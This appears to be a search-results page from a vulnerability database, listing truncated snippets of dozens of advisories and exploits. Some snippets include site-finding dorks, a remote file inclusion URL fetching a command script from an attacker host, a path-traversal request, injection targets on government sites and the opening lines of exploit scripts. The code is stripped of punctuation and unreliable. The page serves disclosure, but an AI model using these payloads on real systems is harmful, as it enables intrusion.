56796 matches found
BP Blog 7.0 (default.asp layout) Remote SQL Injection Vulnerability
No description provided by source. BeyazKurt Script : BP Blog D0rk : "Powered by BP Blog 7.0" thnx : Forever.slam and all WorldHackerz Team! WorldHackerz Mirr0r'da Taht Bizimdir h := ------- Exploit :...
AtomixMP3 M3U/PLS播放列表解析缓冲区溢出漏洞
AtomixMP3是一个电脑用的混音软件,可以将两首歌曲混在一起。 AtomixMP3在处理畸形的M3U、PLS文件时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。 AtomixMP3在解析包含有超长文件名(大于520字节)的M3U和PLS播放列表文件时存在栈溢出漏洞。如果用户受骗加载了恶意的播放列表文件的话就会触发这个漏洞,导致执行任意指令。 AtomixMP3 AtomixMP3 2.3 AtomixMP3 --------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:...
华速网游交易平台SQL注入
SQL注入一:漏洞文件:/help.asp这里id参数过滤不严存在sql注入的,但是conn.asp中包含了:!--include file="conn.asp"-- !--include file="inc/config.asp"-- % if trimrequest"id" "" then set rs=conn.execute"select from help where id ="trimrequest"id"" order by paixu asc" if not rs.eof then title=rs"helptitle" content=rs"helpcontent" e...
ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution
漏洞概要2014年10月3日,国外安全研究员Joshua J. Drake在他github(https://github.com/jduck)提交了针对华硕路由器的一个远程命令执行漏洞poc(https://github.com/jduck/asus-cmd)。该漏洞随后被编号为CVE-2014-9583。知道创宇安全研究团队在第一时间对该命令执行漏洞进行了研究和分析。a 漏洞描述华硕路由器R系列路由器使用开源路由器系统 Asuswrt,开源代码给我们随后的漏洞分析带来很多方便,不用逆向分析。在Asuswrt中存在 infosvr 进程,该进程监听在0.0.0.0...
YXcmsApp v1.2.7 暴力sql注入。
简要描述: rt 详细说明: YXcmsApp 的cookie的加密用的都是dz的那个函数, 看看密钥是怎么来的 protected/apps/install/controller/indexController.php $this-randomcode= substrmd5time, 0, 6; 唔。才6位,那么就很好破解了,poc见测试代码 注册用户,抓包获取cookie yxaut的值, 利用poc得到key后,我们就能根据他的加密函数控制cookie了。 function cpencode$data,$key='',$expire = 0...
Cacti未明远程命令执行漏洞
Bugtraq ID:66387 CVE ID:CVE-2014-2328 Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。 Cacti使用exec-like方法PHP函数调用,由于没有任何安全检查,允许攻击者利用漏洞提交恶意请求执行任意命令。 0 Cacti 0.8.7g 目前没有详细解决方案提供: http://www.cacti.net/...
Ecshop后台两处本地文件包含漏洞
简要描述: 整套程序当中对于某函数未做任何过滤........导致.......你猜......... 求礼物 详细说明: 第一个存在\admin\integrate.php文件中(其实还有好多,我找了两个代表的就提交了) code通过post提交未过滤 第二个存在\admin\shipping.php code通过get提交 漏洞证明: 我在根目录下有一个2.php文件内容是phpinfo url:http://127.0.0.1/ec/admin/integrate.php?act=saveucconfig post:code=..%2F..%2F..%2F2...
MDaemon Server WorldClient脚本注入漏洞
BUGTRAQ ID: 32355 Alt-N MDaemon是一款基于Windows的邮件服务程序,WorldClient是其客户端。 MDaemon的WorldClient客户端没有正确地过滤邮件中的某些HTML标签,如果远程攻击者在邮件中注入了恶意HTML和脚本代码的话,则用户在查看邮件的时候就会在浏览器会话中执行注入的内容。 Alt-N MDaemon 10.0.1 Alt-N ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.altn.com...
Joomla Component MP3 Allopass 1.0 Remote File Inclusion Vulnerability
No description provided by source. commp3allopass joomla component Remote File Include Vulnerability Component : commp3allopass Download file : http://www.joomlaratings.com Dicovered by : NoGe Contact : [email protected]...
EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion Vulnerability
No description provided by source. Title: EQdkp = 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: "powered by EQdkp" Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.c...
D-Link DIR-3060 授权RCE漏洞(CVE-2021-28144)
Advisory: D-Link DIR-3060 Authenticated RCE CVE-2021-28144 MARCH 11, 2021 Overview The D-Link DIR-3060 running firmware versions below v1.11b04 is affected by a post-authentication command injection vulnerability. Anybody with authenticated access to a DIR-3060 would be able to run arbitrary syst...
Oracle VirtualBox Multiple Guest to Host Escape Vulnerabilities(CVE-2018-2698)
Vulnerabilities summary The following advisory describes two 2 guest to host escape found in Oracle VirtualBox version 5.1.30, and VirtualBox version 5.2-rc1. Credit An independent security researcher, Niklas Baumstark, has reported this vulnerability to Beyond Security’s SecuriTeam Secure...
用友U8-OA系统/yyoa/ext/https/getSessionList.jsp文件敏感信息泄漏漏洞
No description provided by source...
easysite内容管理系统某简单粗暴的SQL注入
简要描述: web services是不会骗人的! 大量gov站点采用了easysite内容管理系统。 详细说明: 1.soap注入 easysite webservice 文件: http://www.py.gov.cn/DesktopModules/CInfo/WebService/CInfoService.asmx 2.ArticleIDs参数存在SQL注入漏洞 随便找个放sqlmap里跑吧 POST /DesktopModules/CInfo/WebService/CInfoService.asmx HTTP/1.1 Host: dynamic.xmedu.gov.cn...
RsGallery2 <= 1.11.2 (rsgallery.html.php) File Include Vulnerability
No description provided by source. RsGallery2 for Joomla --------------------------------------------------------------------------- Discovered: marriottvn Remote : Yes Level : High --------------------------------------------------------------------------- Affected software description :...
Sudo 1.6.8 Information Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/11204/info Sudo is reported prone to an information disclosure vulnerability. This vulnerability presents itself when sudo is called with the '-e' option, or the 'sudoedit' command is invoked. In certain circumstances,...
Dotproject 2.0 /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to includ...
大汉版通所属部分系统文件任意文件上传漏洞
简要描述: 任意类型文件上传,可getshell。影响到jact、jsearch、JCMS相关版本,不好一一统计。 详细说明: 受影响的系统版本是WebService中存在一个receivefile操作的,一般在wsInfo服务中。 (注:不同产品不同版本代码可能会有所不同) 0x1 jsearch public String receivefileString strLoginId, String strPwd, String strKey, DataHandler handler, String filename, int iState String result = "";...
JCMS 2010任意文件下载漏洞
大汉版通JCMS 2010内容管理系统是基于J2EE构架设计,以全新理念构建的内容管理系统。系统提供了从内容采集、 创建、管理、传递、发布、共享呈送等信息全生命周期过程中所需的各项功能。 在/module/download/downfile.jsp文件中,没有对pathfile和filename参数进行判断,导致可以下载任意 WEB目录下的文件。 JCMS 2010 SEBUG临时解决办法 对pathfile和filename参数进行合理判断。 ———— http://www.hanweb.com/...
Pligg多个跨站脚本和跨站请求伪造漏洞
BUGTRAQ ID: 37185 Pligg是可以免费下载使用的开源内容管理系统。 Pligg没有正确地过滤用户提交给admin/adminconfig.php、admin/adminmodules.php、 delete.php、editlink.php、submit.php、submitgroups.php、...
Net-SNMP GETBULK请求整数溢出拒绝服务漏洞
CVECAN ID: CVE-2008-4309 Net-SNMP是一个免费的、开放源码的SNMP实现,以前称为UCD-SNMP。 Net-SNMP的实现上存在漏洞,远程攻击者可能利用此漏洞导致服务器拒绝服务。问题存在于agent/snmpagent.c文件的netsnmpcreatesubtreecache函数中,精心构造的畸形的SNMP GETBULK请求会导致函数发生整数溢出,在后续的处理中导致服务进程崩溃。 0 Net-SNMP net-snmp 5.4.x 5.4.2.1 Net-SNMP net-snmp 5.3.x 5.3.2.3 Net-SNMP net-snmp 5.2...
T-Site建站系统 /AjaxFile/DownLoadFile.aspx文件FilePath参数任意文件下载漏洞
No description provided by source...
deV!L`z Clanportal 1.5.2 - Remote File Include Vulnerability
No description provided by source. + deV!Lz Clanportal 1.5.2 Remote File Include Vulnerability + Discovered By: cr4wl3r + Download: http://www.dzcp.de/downloads/?action=download&id=131 x Code in dzcp1.5.2/inc/config.php REQUIRES requireonce$basePath./inc/mysql.php; --- RFI function show$tpl, $arr...
JBoss RichFaces 远程代码执行漏洞(CVE-2013-2165)
Bugtraq ID:61085 CVE ID:CVE-2013-2165 JBoss RichFaces是一个具 Ajax和JSF特性的Web框架 RichFaces ResourceBuilderImpl处理反序列化存在在安全漏洞,允许远程攻击者利用此漏洞发送特殊数据,执行部署在服务器上任意可序列化类中的反序列化方法 此漏洞所产生的影响其严重程序取决于这些类的反序列化逻辑 0 JBoss RichFaces 厂商解决方案 用户可参考如下厂商提供的安全公告获得补丁信息: https://rhn.redhat.com/errata/RHSA-2013-1041.html...
用友dns域传送泄露漏洞
简要描述: dns域传送泄露漏洞 详细说明: 这台的未正确设置 ns1.ufsoft.com.cn Trying Zone Transfer for yonyou.com on ns1.ufsoft.com.cn ... yonyou.com 3600 IN SOA yonyou.com 3600 IN A 125.35.5.132 yonyou.com 3600 IN NS yonyou.com 3600 IN NS yonyou.com 3600 IN NS yonyou.com 3600 IN MX yonyou.com 3600 IN TXT ns3.ufsoft.com.cn...
Firefox XSL解析root XML标签内存破坏漏洞
BUGTRAQ ID: 34235 CVECAN ID: CVE-2009-1169 Firefox是一款非常流行的开放源码WEB浏览器。 Firefox在转换XML文档时没有正确地处理出错情况,特制的XSLT代码可能导致将临时的被破坏栈变量处理为评估上下文对象。漏洞的起因是 evalContext是栈分配的,但在失败的情况下仍被txExecutionState对象引用,该对象的释放器之后又试图删除 evalContext。成功利用这个漏洞的攻击者可能导致浏览器崩溃或在用户机器上执行任意代码。 Mozilla Firefox 3.0.8 Mozilla SeaMonkey 1.1.16...
Microsoft SharePoint远程代码执行漏洞(CVE-2021-31181)
CVE-2021-31181: MICROSOFT SHAREPOINT WEBPART INTERPRETATION CONFLICT REMOTE CODE EXECUTION VULNERABILITY June 02, 2021 | The ZDI Research Team In May of 2021, Microsoft released a patch to correct CVE-2021-31181 – a remote code execution bug in the supported versions of Microsoft SharePoint Serve...
XXE in WeChat Pay SDK
Background “Mobile payments surge to $9 trillion a year, changing how people shop, borrow—even panhandle”, as WSJ.com once reported. As a payment security researcher, I occasionally found a perilous problem about WeChat Pay which I think may be esay to make use of. Therefore, I hope to be able to...
Node.js arbitrary file read Vulnerability(CVE-2017-14849)
Author: niubl@TSRC 1. Vulnerability description 2017 9 November 28, the company scanner found a business there is an example of the arbitrary file read vulnerability, the team follow-up analysis found that this is the Node. js and Express the common result of a Common Vulnerability. As we prepare...
Linux lp.c Out-of-Bounds Write via Kernel Command-line
Vulnerable Versions Linux 4.12-rc1 and below Linux 3.x Linux 2.6.x Linux 2.4.x Linux 2.2.x Mitigation Patch has been committed to the mainline tree, available in the 4.12-rc2 release. 3.18 / 4.4 stable releases with the patch are also avaialble see timeline. Technical Details Due to a missing...
xpshop网店系统sql注入(官网demo演示)
简要描述: 详细说明: 漏洞位置:xpshop.webui.MyRefund protected void PageLoadobject sender, EventArgs e if base.CurrentUser == null string str = "Login.aspx?ReturnUrl=/" + WebUIBase.ShopFolder + "MyRefund.aspx"; base.Response.Redirect"/" + WebUIBase.ShopFolder + str; else if base.CurrentUser.Name == "anonymous"...
Apache Struts ClassLoader操作漏洞
CVE ID:CVE-2014-0094 Struts2 是第二代基于Model-View-Controller MVC模型的java企业级web应用框架。 该应用程序允许访问直接映射到“getClass()”方法的“class”参数 ,这可以被利用来操纵所使用的应用程序服务器的ClassLoader。 0 Apache Struts 2.x 厂商补丁: Apache ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://struts.apache.org/release/2.3.x/docs/s2-020.html...
Pligg <= 9.9.0 (XSS/LFI/SQL) Multiple Remote Vulnerabilities
No description provided by source. Pligg = 9.9.0 Multiple Vulnerabilities July 31, 2008 Vendor : Pligg, LLC URL : http://www.pligg.com/ Version : Pligg = 9.9.0 Risk : Multiple Vulnerabilities Description: Pligg is a popular open source, full featured, content management system written in php. The...
Cisco Unified IP Phone SCCP及SIP协议多个远程安全漏洞
BUGTRAQ ID: 27774 CVECAN ID: CVE-2008-0530,CVE-2008-0526,CVE-2008-0527,CVE-2008-0528,CVE-2008-0529,CVE-2008-0531 Cisco Unified IP Phone是思科的统一IP电话解决方案。 DNS响应解析溢出 运行SCCP和SIP固件的Cisco Unified IP Phone 7940、7940G、7960和7960G设备在处理DNS响应时存在缓冲区溢出漏洞,特制的DNS响应可以触发缓冲区溢出,在有漏洞的电话上执行任意指令。该漏洞记录为CVE-2008-0530和Cisco...
Apache HTTP Server Worker进程多个本地拒绝服务漏洞
BUGTRAQ ID: 24215 CVECAN ID: CVE-2007-3304 Apache HTTP Server是一款流行的Web服务器。 Apache HTTP Server Worker进程实现上存在多个漏洞,本地攻击者可能利用这些漏洞导致服务不可用。 在发送信号之前Apache HTTP Server没有验证进程为Apache子进程。能够在Apache HTTP Server上运行脚本的本地攻击者可以控制记分板并终止任意进程,导致拒绝服务。 如果Apache httpd安装了Prefork...
Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit
No description provided by source. !/bin/bash $Id: raptordominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $ raptordominohash - Lotus Domino R5/R6 HTTPPassword dump Copyright c 2007 Marco Ivaldi [email protected] Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, ...
Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability( CVE-2017-2824)
Official patch earlier to fix the vulnerabilities: the Zabbix database write vulnerability The vulnerability lies within the ìTrapperî section of the Zabbix Code, this is the network service that allows the Proxies and the Server to communicate TCP Port 10051 There are a set of API calls that the...
天融信TopApp-AD /acc/vpn/download.php 下载漏洞
No description provided by source...
Linux & BSD umount Local Root Exploit
No description provided by source. / Reminder - Be sure to fix the includes /str0ke / -------------------------------------- linuxumountexploit.c ---------- include include include include include include define PATHMOUNT /bin/umount define BUFFERSIZE 1024 define DEFAULTOFFSET 50 ulong getesp...
Tomcat 3.0/3.1 Snoop Servlet Information Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1532/info A vulnerability exists in the snoop servlet portion of the Tomcat package, version 3.1, from the Apache Software Foundation. Upon hitting an nonexistent file with the .snp extension, too much information is...
Calibre E-Book Reader Local Root Race Condition Exploit
No description provided by source. !/bin/sh .70-Calibrer Assault Mount by Dan Rosenberg @djrbliss and zx2c4 Yesterday we learned how Calibre's ability to mount anything anywhere resulted in a local root. Today's exploit shows a race condition to subvert recent changes preventing symlinks and...
TikiWiki <= 1.9.8.1 - Local File Inclusion Vulnerabilities
No description provided by source. ====================================================================== TikiWiki = 1.9.8.1 Local File Inclusion ====================================================================== Author: L4teral l4teral 4t gmail com Impact: Local File Inclusion Status: patch...
JBoss JMX Console Beanshell Deployer WAR upload and deployment
No description provided by source. $Id: jbossbshdeployer.rb 11533 2011-01-10 14:34:24Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms o...
fckeditor 2.4.3 upload.php PHP环境下任意文件上传漏洞
No description provided by source...
CMScontrol "id_menu" SQL Injection Vulnerability
A vulnerability has been reported in CMScontrol, which can be exploited by malicious people to conduct SQL injection attacks. Input passed to the "idmenu" parameter in index.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injectin...
mail2forum phpBB Mod <= 1.2 (m2f_root_path) Remote Include Vulns
No description provided by source. Title : mail2forum = 1.2 Multiple Remote File Include Vulnerabilities Discovered By OLiBekaS ----------------------------------------------------------------------------- Affected software description : Application : mail for phpbb bulletin board/forum software...
PHP-Fusion 6.00.3 (rating) Parameter Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl Exploit for PHP-Fusion 6.00.3 Released Coded by:[email protected] Greetz: http://www.curityreason.com use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; if!$ARGV3 printEOF; Exploit for PHP-Fusion 6.00.3 Released Coded by krasza...
F5 Networks 多个漏洞(CVE-2021-22986、CVE-2021-22987、CVE-2021-22988、CVE-2021-22989、CVE-2021-22990、CVE-2021-22991、CVE-2021-22992)
...
Visual Studio Code remote code execution vulnerability
I occasionally noticed that Visual Studio Code was listening on a fixed TCP port 9333. After upgrading to 1.19.3, it’s gone. ➜ netstat -an | grep 9333 tcp4 0 0 127.0.0.1.9333 . LISTEN Looks like it’s a bug that affects VSCode 1.19.01.19.2. Extension process always run in debug mode, because of th...
Oracle Knowledge Management XXE Leading to a RCE
Vulnerability Summary The following advisory describe Information Disclosure found in Oracle Knowledge Management version 8.5.1. By enabling searches across a wide variety of sources, Oracle’s InQuira knowledge management products offer simple and convenient ways for users to access knowledge tha...